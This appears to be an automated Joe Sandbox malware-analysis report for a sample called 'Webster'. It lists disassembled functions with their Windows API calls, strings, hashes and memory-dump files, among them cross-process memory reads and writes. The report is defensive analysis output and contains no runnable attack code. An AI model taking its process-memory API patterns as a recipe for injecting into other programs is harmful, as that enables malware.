                                                                                  • Instruction ID: db4206b66ccf91c6b42a8bd6e4714224c97250ebdfd3de05708c114b171025f3
                                                                                  • Opcode Fuzzy Hash: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
                                                                                  • Instruction Fuzzy Hash: F7F0AF30250204BFEB111FA5EC88FA73BADEF49754F444116F986C7290CFA49E80DB60
                                                                                  Function 00ADCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCD90
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ADCDA7
                                                                                  • MessageBeep.USER32(00000000), ref: 00ADCDBF
                                                                                  • KillTimer.USER32(?,0000040A), ref: 00ADCDDB
                                                                                  • EndDialog.USER32(?,00000001), ref: 00ADCDF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                                                  • Instruction ID: 7cbd0687e916d4092b9e6ea74033ee2909a34e935de60c39ffb6429d138cba55
                                                                                  • Opcode Fuzzy Hash: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                                                  • Instruction Fuzzy Hash: 4601A730510709ABEB206B10DD4EB967B79FB00711F40466AB5C3611D1DBF0A994CA90
                                                                                  Function 00A8178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 00A8179B
                                                                                  • StrokeAndFillPath.GDI32(?,?,00ABBBC9,00000000,?), ref: 00A817B7
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A817CA
                                                                                  • DeleteObject.GDI32 ref: 00A817DD
                                                                                  • StrokePath.GDI32(?), ref: 00A817F8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                                                  • Instruction ID: 564344e1925db18af15cea399264493d2537e59fd244aecee19d7b190273c074
                                                                                  • Opcode Fuzzy Hash: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                                                  • Instruction Fuzzy Hash: A4F03C3404820CEBDB11AF2AED4C7983FA8B702322F44C258F42A961F0CF704A96DF50
                                                                                  Function 00AEC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AECA75
                                                                                  • CoCreateInstance.OLE32(00B13D3C,00000000,00000001,00B13BAC,?), ref: 00AECA8D
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • CoUninitialize.OLE32 ref: 00AECCFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2683427295-24824748
                                                                                  • Opcode ID: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                                                  • Instruction ID: 49dd0fd7a6dbfe742484379ca4cbb3c5759464f33d9e35b42db2acecfc6179d7
                                                                                  • Opcode Fuzzy Hash: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                                                  • Instruction Fuzzy Hash: 7AA13D71104206AFD700EF64C991EAFB7E8EF98754F40491CF155972A2EB70EE49CB92
                                                                                  Function 00A8E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00A91680: _memmove.LIBCMT ref: 00A916DB
                                                                                  • __swprintf.LIBCMT ref: 00A8E598
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A8E431
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 1943609520-557222456
                                                                                  • Opcode ID: c9db09ead774819e78cc787b2e4b34746e3694c31a14f6f5ce8a8a4866873e44
                                                                                  • Instruction ID: 37942479711b158f61cb7b12ef755238590351cbb19244e760368446a3b3f0c1
                                                                                  • Opcode Fuzzy Hash: c9db09ead774819e78cc787b2e4b34746e3694c31a14f6f5ce8a8a4866873e44
                                                                                  • Instruction Fuzzy Hash: 24917C71608201AFCB18FF24C995D6EB7F8EF95700F45491DF4869B2A1EB20ED44CB92
                                                                                  Function 00AA0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$+
                                                                                  • API String ID: 0-2552117581
                                                                                  • Opcode ID: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                                                  • Instruction ID: d6bb90b0fbc38e75e00de96e453c6eab70d0257ee7ac2a8ba323710e111e293f
                                                                                  • Opcode Fuzzy Hash: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                                                  • Instruction Fuzzy Hash: E851DF759042569FDF259F68C880AFE7BA4EF6A310F544056F892AB3D0D734AC82DB60
                                                                                  Function 00A9CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_memmove
                                                                                  • String ID: ERCP
                                                                                  • API String ID: 2532777613-1384759551
                                                                                  • Opcode ID: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                                                  • Instruction ID: cb0ce58888f362a89425ee0c01633b781347693821404ab6d6653ccef62c7558
                                                                                  • Opcode Fuzzy Hash: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                                                  • Instruction Fuzzy Hash: 205192B2A007099BDF24CF65C9857AABBF4EF04314F24856EE94BDB291E770D985CB40
                                                                                  Function 00ADA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E4E,?,?,00000034,00000800,?,00000034), ref: 00AE1CE5
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ADA3F7
                                                                                    • Part of subcall function 00AE1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AE1CB0
                                                                                    • Part of subcall function 00AE1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00AE1C08
                                                                                    • Part of subcall function 00AE1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C18
                                                                                    • Part of subcall function 00AE1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C2E
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA464
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA4B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                                                  • Instruction ID: 8df46b7d15b8830dafbe9486f39d1890e708497e720f446b51878930710d4d3e
                                                                                  • Opcode Fuzzy Hash: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                                                  • Instruction Fuzzy Hash: 1E413CB690122CBFDB10DBA4CD85ADEBBB8EF45300F104095FA55B7280DA706E85CBA1
                                                                                  Function 00B079FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B07A86
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B07A9A
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B07ABE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                                                  • Instruction ID: 5decc111a196ddda296e25612d6c8070f88a127ceff3e2ecd30e878d77bef3d7
                                                                                  • Opcode Fuzzy Hash: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                                                  • Instruction Fuzzy Hash: FF21AD32A50218AFDF218E54CC82FEE7BA9EB48724F114254FE156B1D0DAB1BC508BA0
                                                                                  Function 00B081B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B0826F
                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B0827D
                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B08284
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 4014797782-2298589950
                                                                                  • Opcode ID: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                                                  • Instruction ID: db76b56287857ada73c0da75d781d06873e8b82a46f8510d3617a88dddb4134a
                                                                                  • Opcode Fuzzy Hash: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                                                  • Instruction Fuzzy Hash: C7217AB5604209AFDB10DF58DC85DA73BEDEB5A3A4B140199FA019B3A1CF71ED11CBA0
                                                                                  Function 00B072D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B07360
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B07370
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B07395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                                                  • Instruction ID: c2f5a7b1966e3308be9307271c94a67af0105f2085994d787ac6d44990695690
                                                                                  • Opcode Fuzzy Hash: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                                                  • Instruction Fuzzy Hash: B621C532654118BFEF118F54CC85FBF7BAAEB89754F118164FD00971D0CA71AC529BA0
                                                                                  Function 00B07D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B07D97
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B07DAC
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B07DB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                                                  • Instruction ID: 21ee117a263115badd329aa015f90e4e5f6404025e5f45eccad4d47a5f871f6f
                                                                                  • Opcode Fuzzy Hash: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                                                  • Instruction Fuzzy Hash: 00110AB2644209BFDF245F64CC45FE77BE9EF89754F114229FA41A60D0DA71E851CB20
                                                                                  Function 00AFC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                                                  • Instruction ID: 3741b1511da35f30c6b10f61802e57f9dcf6c6d2f70eb3ef6eb0fba06f33f9e9
                                                                                  • Opcode Fuzzy Hash: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                                                  • Instruction Fuzzy Hash: 78E08C3816070AABD7206B6AC948AA27AD8AF04364B908469F985D2220DBB4C8808B10
                                                                                  Function 00A94BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94AF7,?), ref: 00A94BB8
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A94BCA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-1355242751
                                                                                  • Opcode ID: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                                                  • Instruction ID: 4dcf0a42ed97fdd7dc201ce91b6e83adbf44d294983011580463849d5511497a
                                                                                  • Opcode Fuzzy Hash: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                                                  • Instruction Fuzzy Hash: 24D0C2B0520712DFD7206F30DC08B4672D4AF04340F10CC69E481D6564DEB4C4D0C700
                                                                                  Function 00A94B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94B44,?,00A949D4,?,?,00A927AF,?,00000001), ref: 00A94B85
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A94B97
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-3689287502
                                                                                  • Opcode ID: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                                                  • Instruction ID: a50a7c90f8af16cb21bfa0fd317bd0617fb7b5145e34f26d612efdd5117f9143
                                                                                  • Opcode Fuzzy Hash: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                                                  • Instruction Fuzzy Hash: 43D01270520756DFD7206F35DC18B4676D4AF04355F51C869E485E2564DAB4D4C0C610
                                                                                  Function 00B01447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00B01696), ref: 00B01455
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B01467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
